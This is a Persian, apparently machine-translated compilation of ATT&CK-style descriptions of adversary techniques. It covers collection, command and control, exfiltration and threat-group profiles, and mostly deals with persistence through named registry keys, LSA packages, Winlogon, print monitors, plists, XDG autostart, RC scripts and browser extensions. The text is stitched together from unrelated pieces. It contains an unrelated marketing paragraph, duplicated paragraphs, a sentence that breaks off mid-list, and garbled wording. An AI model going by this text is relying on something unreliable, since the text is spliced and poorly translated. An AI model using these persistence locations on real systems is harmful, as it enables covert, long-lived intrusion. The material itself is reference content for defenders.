پس از ایجاد در یک سیستم یا شبکه، یک دشمن ممکن است از تکنیک های خودکار برای جمع آوری داده های داخلی استفاده کند. روش‌های اجرای این تکنیک می‌تواند شامل استفاده از یک مترجم فرمان و اسکریپت برای جستجو و کپی اطلاعات متناسب با معیارهای مجموعه‌ای مانند نوع فایل، مکان یا نام در فواصل زمانی خاص باشد. این قابلیت همچنین می تواند در ابزارهای دسترسی از راه دور تعبیه شود. این تکنیک ممکن است شامل استفاده از تکنیک‌های دیگری مانند کشف فایل و فهرست و انتقال ابزار جانبی برای شناسایی و جابجایی فایل‌ها باشد.

دشمنان ممکن است با استفاده از پروتکل های لایه برنامه ارتباط برقرار کنند تا از شناسایی/فیلتر شبکه با ترکیب شدن با ترافیک موجود جلوگیری کنند. دستورات به سیستم راه دور، و اغلب نتایج آن دستورات، در ترافیک پروتکل بین مشتری و سرور تعبیه می شود. دشمنان ممکن است از پروتکل‌های مختلفی استفاده کنند، از جمله پروتکل‌هایی که برای مرور وب، انتقال فایل‌ها، نامه الکترونیکی یا DNS استفاده می‌شوند. برای اتصالاتی که به صورت داخلی در یک محصور (مانند اتصالات بین یک پروکسی یا گره محوری و سایر گره ها) اتفاق می افتد، پروتکل های رایج مورد استفاده SMB، SSH یا RDP هستند.

دشمنان ممکن است از طریق استفاده از پردازش خودکار پس از جمع‌آوری در طول جمع‌آوری، داده‌هایی مانند اسناد حساس را استخراج کنند.هنگامی که از اکسفیلتراسیون خودکار استفاده می شود، سایر تکنیک های اکسفیلتراسیون احتمالاً برای انتقال اطلاعات به خارج از شبکه نیز کاربرد دارند. مانند: and .

دشمنان ممکن است با ممانعت از دسترسی به حساب های استفاده شده توسط کاربران قانونی، دسترسی به منابع سیستم و شبکه را قطع کنند. حساب‌ها ممکن است حذف، قفل یا دستکاری شوند (مثلاً: تغییر اعتبار) برای حذف دسترسی به حساب‌ها. همچنین ممکن است متعاقباً دشمنان از سیستم خارج شوند و/یا جعبه‌ها را مجدداً راه‌اندازی کنند تا تغییرات مخرب را در جای خود تنظیم کنند.

یک گروه تهدید سایبری مستقر در چین است. قبلاً از رویدادهای خبری به عنوان فریب برای ارائه بدافزار استفاده کرده است و در درجه اول سازمان‌های درگیر در سیاست‌های مالی، اقتصادی و تجاری را هدف قرار داده است، معمولاً از RATهای در دسترس عمومی مانند PoisonIvy و همچنین برخی از درهای پشتی غیر عمومی استفاده می‌کنند.

تیم امنیتی آژاکس گروهی است که حداقل از سال 2010 فعال بوده و گمان می رود در خارج از ایران فعالیت می کند. تا سال 2014، تیم امنیتی آژاکس از عملیات تخریب وب سایت به کمپین های جاسوسی سایبری مبتنی بر بدافزار که پایگاه صنعتی دفاعی ایالات متحده و کاربران ایرانی فناوری های ضد سانسور را هدف قرار می دهد، انتقال یافت.

اندریل یک گروه تهدید کننده تحت حمایت دولت کره شمالی است که حداقل از سال 2009 فعال بوده است. آنها همچنین عملیات مالی سایبری را علیه دستگاه‌های خودپرداز، بانک‌ها و صرافی‌های ارزهای دیجیتال انجام داده‌اند. فعالیت های قابل توجه Andariel شامل عملیات Black Mine، Operation GoldenAxe و Campaign Rifle است.اندریل زیرمجموعه ای از گروه لازاروس محسوب می شود و به دفتر عمومی شناسایی کره شمالی نسبت داده می شود. تعاریف گروه کره شمالی دارای همپوشانی قابل توجهی هستند و برخی از محققان امنیتی همه فعالیت های سایبری تحت حمایت دولت کره شمالی را تحت نام گروه لازاروس به جای ردیابی خوشه ها یا زیر گروه ها گزارش می دهند.

Axiom یک گروه جاسوسی سایبری است که مظنون به ارتباط با دولت چین است. مسئول کمپین عملیات SMN است. اگرچه هم این گروه و هم گروه Winnti از بدافزار Winnti برای ویندوز استفاده می‌کنند، به نظر می‌رسد این دو گروه بر اساس تفاوت در گزارش‌گیری در مورد TTP و هدف‌گیری گروه‌ها از هم متمایز هستند.

حمله دور زدن غیر مستقیم‌ترین استراتژی بازاریابی است که توسط شرکت چالش برانگیز با هدف پیشی گرفتن از رقیب با حمله به بازارهای آسان‌تر آن اتخاذ شده است. هدف از این استراتژی افزایش منابع شرکت یا تصاحب سهم بازار شرکت رقیب است.

دشمنان ممکن است تنظیمات سیستم را برای اجرای خودکار یک برنامه در حین بوت شدن یا ورود به سیستم پیکربندی کنند تا پایداری خود را حفظ کنند یا امتیازات سطح بالاتر را در سیستم های در معرض خطر به دست آورند. سیستم‌های عامل ممکن است مکانیسم‌هایی برای اجرای خودکار یک برنامه در هنگام راه‌اندازی سیستم یا ورود به حساب داشته باشند. این مکانیسم‌ها ممکن است شامل برنامه‌هایی باشد که به طور خودکار اجرا می‌شوند که در دایرکتوری‌های مشخص شده قرار می‌گیرند یا توسط مخازنی که اطلاعات پیکربندی را ذخیره می‌کنند، مانند رجیستری ویندوز، ارجاع داده می‌شوند. یک دشمن ممکن است با اصلاح یا گسترش ویژگی‌های هسته به همان هدف دست یابد. از آنجایی که برخی از برنامه‌های راه‌اندازی خودکار یا ورود به سیستم با امتیازات بالاتر اجرا می‌شوند، دشمن ممکن است از آنها برای افزایش امتیازات استفاده کند.

دشمنان ممکن است با افزودن یک برنامه به پوشه راه‌اندازی یا ارجاع دادن به آن با یک کلید اجرای رجیستری به پایداری دست یابند. افزودن یک ورودی به "کلیدهای اجرا" در رجیستری یا پوشه راه‌اندازی باعث می‌شود برنامه ارجاع‌شده در هنگام ورود کاربر اجرا شود. این برنامه‌ها تحت شرایط کاربر اجرا می‌شوند و مجوزهای مربوط به حساب را خواهند داشت. مرحله. قرار دادن یک برنامه در یک پوشه راه‌اندازی همچنین باعث می‌شود که وقتی کاربر وارد می‌شود، آن برنامه اجرا شود. یک مکان پوشه راه‌اندازی برای حساب‌های کاربری فردی و همچنین یک پوشه راه‌اندازی در سراسر سیستم وجود دارد که بدون در نظر گرفتن اینکه کدام حساب کاربری وارد شده است بررسی می‌شود.

هنگامی که سیستم بوت می شود، دشمنان ممکن است از بسته های احراز هویت برای اجرای DLL سوء استفاده کنند. DLL های بسته احراز هویت ویندوز توسط فرآیند محلی امنیت (LSA) در شروع سیستم بارگیری می‌شوند. آنها از چندین فرآیند ورود به سیستم و چندین پروتکل امنیتی برای سیستم عامل پشتیبانی می کنند. دشمنان می توانند با قرار دادن ارجاع به یک باینری در مکان رجیستری ویندوز HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ با مقدار کلیدی "Authentication Packages"=<target binary>از مکانیسم شروع خودکار ارائه شده توسط بسته های احراز هویت LSA برای تداوم استفاده کنند. پس از بارگیری بسته های احراز هویت، باینری توسط سیستم اجرا می شود.

هنگامی که سیستم بوت می شود، ممکن است دشمنان از ارائه دهندگان زمان برای اجرای DLL سوء استفاده کنند. سرویس (W32Time) همگام سازی زمان را در دامنه ها و درون دامنه ها فعال می کند. ارائه دهندگان زمان W32Time مسئول بازیابی مهرهای زمانی از منابع سخت افزاری/ شبکه و خروجی این مقادیر به سایر مشتریان شبکه هستند. ارائه‌دهندگان زمان به‌عنوان کتابخانه‌های پیوند پویا (DLL)پیاده‌سازی می‌شوند که در کلیدهای فرعی زیر ثبت شده‌اند. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\ مدیر ارائه‌دهنده زمان، که توسط مدیر کنترل سرویس هدایت می‌شود، ارائه‌دهندگان زمان فهرست‌شده و فعال در زیر این کلید را هنگام راه‌اندازی سیستم و/یا هر زمان که پارامترها تغییر می‌کنند، بارگیری و راه‌اندازی می‌کند. دشمنان ممکن است از این معماری برای ایجاد تداوم سوء استفاده کنند، به ویژه با ثبت و فعال کردن یک DLL مخرب به عنوان ارائه‌دهنده زمان. امتیازات سرپرست برای ثبت نام ارائه‌دهنده زمانی مورد نیاز است، اگرچه اجرا در زمینه حساب Local Service اجرا می‌شود.

هنگامی که کاربر وارد سیستم می‌شود، ممکن است دشمنان از ویژگی‌های Winlogon برای اجرای DLL و یا فایل‌های اجرایی سوء استفاده کنند. Winlogon.exe یک مؤلفه ویندوز است که مسئول اقدامات در هنگام ورود/خروج و همچنین توالی توجه ایمن (SAS) است که توسط Ctrl-Alt-Delete فعال می‌شود. ورودی‌های رجیستری در HKLM\Software[\Wow6432Node\]\Microsoft\WindowsNT\CurrentVersion\Winlogon\ و HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ برای مدیریت برنامه‌های کمکی اضافی و عملکردهای Winlogon استفاده می‌شوند. تغییرات مخرب در این کلیدهای رجیستری ممکن است باعث شود Winlogon DLL ها و یا فایل های اجرایی مخرب را بارگیری و اجرا کند. به طور خاص، کلیدهای فرعی زیر احتمالاً در معرض سوء استفاده هستند: Winlogon\Notify - به DLL های بسته اعلان اشاره می کند که رویدادهای Winlogon را مدیریت می کنند. Winlogon\Userinit - به userinit.exe اشاره می کند، برنامه مقداردهی اولیه کاربر که هنگام ورود کاربر اجرا می شود. Winlogon\Shell - به explorer.exe اشاره می کند، پوسته سیستمی که هنگام ورود کاربر اجرا می شود. دشمنان ممکن است از این ویژگی ها برای اجرای مکرر کدهای مخرب و ایجاد پایداری استفاده کنند.

هنگامی که سیستم بوت می شود، ممکن است دشمنان از ارائه دهندگان پشتیبانی امنیتی ( SSP) برای اجرای DLL سوء استفاده کنند. DLL های Windows SSP در هنگام شروع سیستم در فرآیند Local Security Authority (LSA) بارگذاری می شوند. پس از بارگیری در LSA، DLL های SSP به رمزهای عبور رمزگذاری شده و متن ساده که در ویندوز ذخیره می شوند، مانند رمز عبور دامنه یا پین کارت هوشمند هر کاربر وارد شده دسترسی دارند. پیکربندی SSP در دو کلید رجیستری ذخیره می شود: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages و HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages حریف ممکن است این کلیدهای رجیستری را تغییر دهد تا SSPهای جدید اضافه کند، که دفعه بعد که سیستم بوت می شود، یا زمانی که تابع AddSecurityPackage Windows API فراخوانی می شود، بارگذاری می‌شوند.

دشمنان ممکن است کرنل را تغییر دهند تا به طور خودکار برنامه ها را در بوت سیستم اجرا کند. ماژول‌های کرنل قابل بارگیری ( LKM) قطعه‌هایی از کد هستند که می‌توانند در صورت تقاضا در هسته بارگیری و تخلیه شوند. آنها عملکرد هسته را بدون نیاز به راه اندازی مجدد سیستم گسترش می دهند. به عنوان مثال، یک نوع ماژول، درایور دستگاه است که به هسته اجازه می دهد تا به سخت افزار متصل به سیستم دسترسی پیدا کند. هنگامی که به طور مخرب استفاده می شود، LKM ها می توانند یک نوع Rootkit در حالت هسته باشند که با بالاترین امتیاز سیستم عامل (Ring 0 ) اجرا می شوند. ویژگی‌های رایج روت‌کیت‌های مبتنی بر LKM عبارتند از: پنهان کردن خود، مخفی کردن انتخابی فایل‌ها، فرآیندها و فعالیت‌های شبکه، و همچنین دستکاری گزارش‌ها، ارائه درب‌های پشتی تأیید شده و امکان دسترسی روت به کاربران غیرمجاز. پسوندهای هسته، که kext نیز نامیده می‌شوند، برای macOS استفاده می‌شوند تا عملکردها را روی سیستمی مشابه LKMs برای لینوکس بارگذاری کنند. آنها از طریق دستورات kextload و kextunload بارگیری و تخلیه می شوند.

دشمنان ممکن است فایل‌های plist را تغییر دهند تا زمانی که کاربر وارد سیستم می‌شود، برنامه را به‌طور خودکار اجرا کند. با شروع Mac OS X 10.7 (Lion) کاربران می‌توانند برنامه‌های خاصی را مشخص کنند که وقتی کاربر پس از راه‌اندازی مجدد به دستگاه خود وارد می‌شود، دوباره باز شوند. در حالی که این کار معمولاً از طریق یک رابط کاربری گرافیکی ( GUI) بر اساس برنامه به برنامه انجام می‌شود، فایل‌های فهرست دارایی ( plist)وجود دارند که حاوی این اطلاعات هستند و همچنین در ~/Library/Preferences/com.apple.loginwindow.plist و ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. قرار دارند. حریف می‌تواند یکی از این فایل‌ها را مستقیماً تغییر دهد تا پیوندی به فایل اجرایی مخرب خود اضافه کند تا هر بار که کاربر دستگاه خود را راه‌اندازی مجدد می‌کند، مکانیزم پایداری ارائه کند.

دشمنان ممکن است درایورهای LSASSرا تغییر داده یا اضافه کنند تا پایداری در سیستم های در معرض خطر را به دست آورند. زیرسیستم امنیتی ویندوز مجموعه ای از مؤلفه ها است که خط مشی امنیتی یک رایانه یا دامنه را مدیریت و اجرا می کند. سازمان امنیت محلی (LSA)مؤلفه اصلی مسئول سیاست امنیتی محلی و تأیید اعتبار کاربر است. LSA شامل چندین کتابخانه پیوند پویا (DLL) مرتبط با توابع امنیتی مختلف است که همه آنها در چارچوب خدمات زیرسیستم LSA (LSASS) lsass.exe اجرا می شوند. دشمنان ممکن است درایورهای LSASS را برای به دست آوردن پایداری هدف قرار دهند. با جایگزین کردن یا اضافه کردن درایورهای نامشروع به عنوان مثال، ( Hijack Execution Flow) ، یک دشمن می تواند از عملیات LSA برای اجرای مداوم بارهای مخرب استفاده کند.

دشمنان ممکن است میانبرهایی را برای اجرای یک برنامه در هنگام بوت شدن سیستم یا ورود کاربر ایجاد یا ویرایش کنند. میانبرها یا پیوندهای نمادین راه هایی برای ارجاع به فایل ها یا برنامه های دیگر هستند که با کلیک یا اجرای میانبر توسط فرآیند راه اندازی سیستم، باز یا اجرا می شوند. دشمنان می توانند از میانبرها برای اجرای ابزارهای خود برای پایداری استفاده کنند. آنها ممکن است یک میانبر جدید به عنوان وسیله ای برای غیرمستقیم ایجاد کنند که ممکن است از Masquerading برای شبیه به یک برنامه قانونی استفاده کند. دشمنان همچنین می توانند مسیر هدف را ویرایش کنند یا به طور کامل یک میانبر موجود را جایگزین کنند تا ابزارهای آنها به جای برنامه قانونی مورد نظر اجرا شود.

دشمنان ممکن است از مانیتورهای پورت برای اجرای DLL ارائه شده توسط مهاجم در هنگام بوت شدن سیستم برای تداوم یا افزایش امتیاز استفاده کنند. یک مانیتور پورت را می توان از طریق فراخوانی AddMonitor API تنظیم کرد تا یک DLL را برای بارگذاری در هنگام راه اندازی تنظیم کند. این DLL را می توان در C:\Windows\System32 قرار داد و توسط سرویس spooler چاپ، spoolsv.exe، در بوت بارگیری می شود. فرآیند spoolsv.exe نیز تحت مجوزهای سطح SYSTEM اجرا می شود. همچنین، اگر مجوزها اجازه نوشتن یک نام مسیر کاملاً واجد شرایط برای آن DLL را در HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors بدهند، می‌توان یک DLL دلخواه بارگیری کرد. کلید رجیستری حاوی ورودی هایی برای موارد زیر است: پورت محلی پورت استاندارد TCP/IP مانیتور USB پورت WSD دشمنان می توانند از این تکنیک برای بارگذاری کدهای مخرب در هنگام راه اندازی استفاده کنند که در راه اندازی مجدد سیستم و اجرا به عنوان SYSTEM ادامه می یابد.

دشمنان می توانند فایل‌های لیست اموال (فایل‌های plist) را برای اجرای کد خود به عنوان بخشی از ایجاد پایداری تغییر دهند. فایل‌های Plist توسط برنامه‌های macOS برای ذخیره ویژگی‌ها و تنظیمات پیکربندی برنامه‌ها و سرویس‌ها استفاده می‌شوند. برنامه‌ها از فایل‌های plist اطلاعاتی، Info.plist، استفاده می‌کنند تا به سیستم عامل بگویید که چگونه برنامه را در زمان اجرا با استفاده از ابرداده ساختاریافته در قالب کلیدها و مقادیر مدیریت کند. فایل‌های Plist در XML و بر اساسCore Foundation DTD اپل فرمت‌بندی شده‌اند و می‌توانند در قالب متن یا باینری ذخیره شوند. دشمنان می‌توانند مسیرهای باینری‌های اجرا شده را تغییر دهند، آرگومان‌های خط فرمان اضافه کنند و مقادیر کلید/جفت را برای فهرست فایل‌ها در مکان‌های اجرای خودکار که پس از ورود کاربر یا راه‌اندازی سیستم اجرا می‌شوند، وارد کنند. از طریق اصلاح فایل‌های plist در این مکان‌ها، دشمنان همچنین می‌توانند یک کتابخانه پویا مخرب (dylib) را با افزودن یک فرهنگ لغت حاوی کلید DYLD_INSERT_LIBRARIES همراه با مسیری به dylib مخرب در زیر کلید EnvironmentVariables در یک فایل plist اجرا کنند. پس از ورود کاربر، plist برای اجرا فراخوانی می شود و dylib مخرب در فضای فرآیند اجرا می شود. پایداری را نیز می توان با تغییر کلید LSEnvironment در فایل Info.plist برنامه به دست آورد.

دشمنان ممکن است از پردازنده های چاپ برای اجرای DLL های مخرب در هنگام بوت شدن سیستم برای تداوم و یا افزایش امتیاز سوءاستفاده کنند. پردازنده های چاپ DLL هایی هستند که توسط سرویس spooler چاپ، spoolsv.exe، در هنگام بوت بارگیری می شوند. دشمنان ممکن است با افزودن پردازنده های چاپی که DLL های مخرب را در هنگام راه اندازی بارگیری می کنند، از سرویس اسپولر چاپ سوء استفاده کنند. یک پردازشگر چاپ را می توان از طریق تماس AddPrintProcessor API با حسابی که SeLoadDriverPrivilege را فعال کرده است نصب کرد.

دشمنان ممکن است ورودی های شروع خودکار XDG را برای اجرای برنامه ها یا دستورات در هنگام بوت سیستم تغییر دهند. محیط‌های دسک‌تاپ لینوکس که با XDG سازگار هستند، عملکردی را برای ورودی‌های شروع خودکار XDG اجرا می‌کنند. این ورودی‌ها به یک برنامه اجازه می‌دهد تا در هنگام راه‌اندازی یک محیط دسک‌تاپ پس از ورود کاربر به طور خودکار شروع به کار کند. به طور پیش‌فرض، ورودی‌های شروع خودکار XDG در دایرکتوری‌های /etc/xdg/autostart یا ~/.config/autostart ذخیره می‌شوند و دارای پسوند فایل دسکتاپ. در یک فایل ورودی XDG autostart، کلید Type مشخص می کند که آیا ورودی یک برنامه کاربردی (نوع 1)، پیوند (نوع 2) یا دایرکتوری (نوع 3) است. کلید Name یک نام دلخواه را نشان می‌دهد که توسط سازنده و کلید Exec برنامه و آرگومان‌های خط فرمان را برای اجرا نشان می‌دهد. دشمنان ممکن است از ورودی های XDG autostart برای حفظ پایداری با اجرای دستورات و بارهای مخرب، مانند ابزارهای دسترسی از راه دور، در طول راه اندازی یک محیط دسکتاپ استفاده کنند. دستورات موجود در ورودی‌های XDG autostart با اجرا پس از ورود کاربر در زمینه کاربر وارد شده در حال حاضر. دشمنان همچنین ممکن است از Masquerading استفاده کنند تا ورودی های شروع خودکار XDG طوری به نظر برسند که گویی با برنامه های قانونی مرتبط هستند.

دشمنان ممکن است با افزودن یک کلید رجیستری به تنظیمات Active Setup ماشین محلی به پایداری دست یابند. Active Setup یک مکانیسم ویندوزی است که برای اجرای برنامه ها هنگام ورود کاربر استفاده می شود. مقدار ذخیره شده در کلید Registry پس از ورود کاربر به رایانه اجرا می شود. این برنامه ها تحت شرایط کاربر اجرا می شوند و سطح مجوزهای مرتبط با حساب را خواهند داشت. دشمنان ممکن است با ایجاد یک کلید در زیر HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ و تنظیم یک مقدار مخرب برای StubPath از Active Setup سوءاستفاده کنند. این مقدار به عنوان برنامه ای عمل می کند که زمانی که کاربر وارد رایانه می شود اجرا می شود. دشمنان می توانند از این مؤلفه ها برای اجرای بدافزارها، مانند ابزارهای دسترسی از راه دور، برای حفظ پایداری از طریق راه اندازی مجدد سیستم سوء استفاده کنند. همچنین ممکن است دشمنان از Masquerading استفاده کنند تا ورودی‌های رجیستری را طوری نشان دهند که گویی با برنامه‌های قانونی مرتبط هستند.

دشمنان ممکن است موارد ورود به سیستم را برای اجرا در هنگام ورود کاربر اضافه کنند تا تداوم داشته باشند یا امتیازات را افزایش دهند. موارد ورود به سیستم برنامه‌ها، اسناد، پوشه‌ها یا اتصالات سرور هستند که با ورود کاربر به‌طور خودکار راه‌اندازی می‌شوند. موارد ورود به سیستم را می‌توان از طریق یک لیست فایل مشترک یا چارچوب مدیریت خدمات اضافه کرد. موارد ورود به لیست فایل‌های مشترک را می‌توان با استفاده از زبان‌های برنامه نویسی مانندAppleScriptتنظیم کرد، در حالی که چارچوب مدیریت خدمات از فراخوانی API SMLoginItemSetEnabled استفاده می کند. موارد ورود به سیستم نصب شده با استفاده از اهرم چارچوب مدیریت خدمات راه اندازی شده است، در تنظیمات برگزیده سیستم قابل مشاهده نیستند و فقط می توانند توسط برنامه ای که آنها را ایجاد کرده است حذف شوند. موارد ورود ایجاد شده با استفاده از یک لیست فایل مشترک در تنظیمات برگزیده سیستم قابل مشاهده هستند، می توانند برنامه را هنگام راه اندازی پنهان کنند، و از طریق LaunchServices اجرا می شوند، نه راه اندازی شده، برای باز کردن برنامه ها، اسناد، یا URL ها بدون استفاده از launchd کاربران و برنامه‌ها از آیتم‌های ورود به سیستم برای پیکربندی محیط کاربری خود برای راه‌اندازی سرویس‌ها یا برنامه‌های کاربردی رایج، مانند برنامه‌های ایمیل، چت و موسیقی استفاده می‌کنند.

دشمنان ممکن است از اسکریپت‌هایی استفاده کنند که به طور خودکار در هنگام راه‌اندازی اولیه یا ورود به سیستم اجرا می شوند تا پایداری ایجاد کنند. از اسکریپت های اولیه می توان برای انجام عملکردهای مدیریتی استفاده کرد، که اغلب ممکن است برنامه های دیگر را اجرا کند یا اطلاعات را به یک سرور ثبت داخلی ارسال کند. این اسکریپت ها می توانند بر اساس سیستم عامل و اینکه به صورت محلی یا از راه دور اعمال شوند، متفاوت باشند. دشمنان ممکن است از این اسکریپت ها برای حفظ پایداری در یک سیستم واحد استفاده کنند. بسته به پیکربندی دسترسی اسکریپت های ورود، ممکن است اعتبار محلی یا حساب مدیر لازم باشد. یک حریف همچنین ممکن است بتواند امتیازات خود را افزایش دهد زیرا برخی از اسکریپت های راه اندازی اولیه یا ورود به سیستم با امتیازات بالاتر اجرا می شوند.

دشمنان ممکن است از اسکریپت های ورود به سیستم ویندوز استفاده کنند که به طور خودکار در هنگام شروع ورود به سیستم اجرا می شوند تا پایداری ایجاد کنند. ویندوز اجازه می دهد تا هر زمان که یک کاربر خاص یا گروهی از کاربران وارد سیستم می شوند، اسکریپت های ورود به سیستم اجرا شوند. این کار از طریق افزودن یک مسیر به یک اسکریپت به کلید رجیستری HKCU\Environment\UserInitMprLogonScript انجام می‌شود. دشمنان ممکن است از این اسکریپت ها برای حفظ پایداری در یک سیستم واحد استفاده کنند. بسته به پیکربندی دسترسی اسکریپت های ورود، ممکن است اعتبار محلی یا حساب مدیر لازم باشد.

دشمنان ممکن است از اسکریپت‌های ورود به شبکه استفاده کنند که به طور خودکار در هنگام شروع ورود به سیستم اجرا می شوند تا پایداری ایجاد کنند. اسکریپت‌های ورود به شبکه را می‌توان با استفاده ازActive Directory یا Group Policy Objects اختصاص داد. این اسکریپت های لاگین با امتیازات کاربری که به آنها اختصاص داده شده اجرا می شوند. بسته به سیستم های درون شبکه، مقداردهی اولیه یکی از این اسکریپت ها می تواند برای بیش از یک یا به طور بالقوه همه سیستم ها اعمال شود.

دشمنان ممکن است با تغییر اسکریپت‌های RCکه در طول راه‌اندازی یک سیستم شبه یونیکس اجرا می‌شوند، پایداری خود را ایجاد کنند. این فایل‌ها به مدیران سیستم اجازه می‌دهند تا در هنگام راه‌اندازی، خدمات سفارشی را برای سطوح مختلف اجرا نقشه‌برداری و شروع کنند. اسکریپت های RC برای اصلاح به امتیازات ریشه نیاز دارند. دشمنان می توانند با افزودن یک مسیر مخرب باینری یا دستورات پوسته به rc.common ,rc.local و سایر اسکریپت های RC خاص برای توزیع شبه یونیکس، پایداری را ایجاد کنند. پس از راه اندازی مجدد، سیستم محتویات اسکریپت را به صورت روت اجرا می کند و در نتیجه ماندگاری ایجاد می کند. سوء استفاده دشمن از اسکریپت های RC به ویژه برای توزیع های سبک وزن یونیکس با استفاده از کاربر ریشه به عنوان پیش فرض، مانند اینترنت اشیا یا سیستم های جاسازی شده، موثر است. چندین سیستم شبه یونیکس به Systemd نقل مکان کرده اند و استفاده از اسکریپت های RCرا منسوخ کرده اند. اکنون این یک مکانیسم منسوخ در macOS به نفع Launchd است. این تکنیک را می‌توان در Mac OS X Panther نسخه 10.3 و نسخه‌های قبلی که هنوز اسکریپت‌های RC را اجرا می‌کنند، استفاده کرد. برای حفظ سازگاری به عقب، برخی از سیستم‌ها، مانند اوبونتو، اسکریپت‌های RCرا در صورتی که با مجوزهای صحیح فایل وجود داشته باشند، اجرا می‌کنند.

دشمنان ممکن است از آیتم‌های راه‌اندازی استفاده کنند که به‌طور خودکار در هنگام راه‌اندازی اولیه اجرا می‌شوند تا پایداری ایجاد کنند. موارد راه‌اندازی در مرحله نهایی فرآیند بوت اجرا می‌شوند و حاوی اسکریپت‌های پوسته یا سایر فایل‌های اجرایی به همراه اطلاعات پیکربندی مورد استفاده توسط سیستم برای تعیین ترتیب اجرا برای همه موارد راه‌اندازی هستند. این از نظر فنی یک فناوری منسوخ شده است (که توسط Launch Daemon جایگزین شده است) و بنابراین پوشه مناسب، /Library/StartupItems به طور پیش فرض در سیستم تضمین نمی شود، اما به نظر می رسد به طور پیش فرض در macOS Sierra وجود داشته باشد. آیتم راه اندازی دایرکتوری است که لیست ویژگی های اجرایی و پیکربندی آن (plist)، StartupParameters.plist، در دایرکتوری سطح بالا قرار دارد. یک حریف می‌تواند پوشه‌ها/فایل‌های مناسب را در فهرست StartupItems ایجاد کند تا مکانیسم پایداری خود را ثبت کند. علاوه بر این، از آنجایی که StartupItems در مرحله راه‌اندازی macOS اجرا می‌شود، به‌عنوان کاربر ریشه بالا اجرا می‌شود.

ممکن است دشمنان از افزونه های مرورگر اینترنت برای ایجاد دسترسی دائمی به سیستم های قربانی سوء استفاده کنند. افزونه‌ها یا افزونه‌های مرورگر برنامه‌های کوچکی هستند که می‌توانند قابلیت‌ها را اضافه کرده و جنبه‌هایی از مرورگرهای اینترنت را سفارشی کنند. آنها را می توان مستقیماً یا از طریق فروشگاه برنامه مرورگر نصب کرد و به طور کلی به هر چیزی که مرورگر می‌تواند به آن دسترسی داشته باشد دسترسی و مجوز دارد.برنامه‌های افزودنی مخرب را می‌توان از طریق دانلودهای فروشگاه برنامه‌های مخرب که به عنوان برنامه‌های افزودنی قانونی ظاهر می‌شوند، از طریق مهندسی اجتماعی، یا توسط دشمنی که قبلاً یک سیستم را به خطر انداخته است، در مرورگر نصب کرد. امنیت را می توان در فروشگاه های برنامه مرورگر محدود کرد، بنابراین ممکن است برای برنامه های افزودنی مخرب شکست دادن اسکنرهای خودکار دشوار نباشد. بسته به مرورگر، دشمنان همچنین ممکن است URL به‌روزرسانی یک برنامه افزودنی را برای نصب به‌روزرسانی‌ها از سرور کنترل‌شده دشمن دستکاری کنند یا فایل پیکربندی تلفن همراه را برای نصب بی‌صدا پسوندهای اضافی دستکاری کنند. قبل از macOS11، دشمنان می‌توانستند بی‌صدا افزونه‌های مرورگر را از طریق خط فرمان با استفاده از ابزار پروفایل‌ها برای نصب فایل‌های مخرب .mobileconfig نصب کنند. درmacOS 11+ ، استفاده از ابزار پروفایل‌ها دیگر نمی‌تواند نمایه‌های پیکربندی را نصب کند، اما فایل‌های .mobileconfig را می‌توان با تعامل کاربر نصب و نصب کرد. پس از نصب برنامه افزودنی، می‌تواند وب‌سایت‌ها را در پس‌زمینه مرور کند، تمام اطلاعاتی را که کاربر در مرورگر وارد می‌کند (از جمله اعتبارنامه‌ها) بدزدد و به‌عنوان یک نصب‌کننده برای RAT استفاده شود. برای ماندگاریهمچنین مواردی از بات‌نت‌ها وجود داشته است که از یک درب پشتی دائمی از طریق برنامه‌های افزودنی مخرب Chrome استفاده می‌کنند. همچنین نمونه‌های مشابهی از برنامه‌های افزودنی برای فرمان و کنترل استفاده شده است.

دشمنان ممکن است تنظیمات سیستم را برای اجرای خودکار یک برنامه در حین بوت شدن یا ورود به سیستم پیکربندی کنند تا پایداری خود را حفظ کنند یا امتیازات سطح بالاتر را در سیستم های در معرض خطر به دست آورند. سیستم‌های عامل ممکن است مکانیسم‌هایی برای اجرای خودکار یک برنامه در هنگام راه‌اندازی سیستم یا ورود به حساب داشته باشند. این مکانیسم‌ها ممکن است شامل برنامه‌هایی باشد که به طور خودکار اجرا می‌شوند که در دایرکتوری‌های مشخص شده قرار می‌گیرند یا توسط مخازنی که اطلاعات پیکربندی را ذخیره می‌کنند، مانند رجیستری ویندوز، ارجاع داده می‌شوند. یک دشمن ممکن است با اصلاح یا گسترش ویژگی‌های هسته به همان هدف دست یابد. از آنجایی که برخی از برنامه‌های راه‌اندازی خودکار یا ورود به سیستم با امتیازات بالاتر اجرا می‌شوند، دشمن ممکن است از آنها برای افزایش امتیازات استفاده کند.

دشمنان ممکن است با افزودن یک برنامه به پوشه راه‌اندازی یا ارجاع دادن به آن با یک کلید اجرای رجیستری به پایداری دست یابند. افزودن یک ورودی به "کلیدهای اجرا" در رجیستری یا پوشه راه‌اندازی باعث می‌شود برنامه ارجاع‌شده در هنگام ورود کاربر اجرا شود. این برنامه‌ها تحت شرایط کاربر اجرا می‌شوند و مجوزهای مربوط به مرحله حساب را خواهند داشت. قرار دادن یک برنامه در یک پوشه راه‌اندازی همچنین باعث می‌شود که وقتی کاربر وارد می‌شود، آن برنامه اجرا شود. یک مکان پوشه راه‌اندازی برای حساب‌های کاربری فردی و همچنین یک پوشه راه‌اندازی در سراسر سیستم وجود دارد که بدون در نظر گرفتن اینکه کدام حساب کاربری وارد شده است بررسی می‌شود. مسیر پوشه راه اندازی برای کاربر فعلی به شرح زیر است: C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup مسیر پوشه راه اندازی برای همه کاربران: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

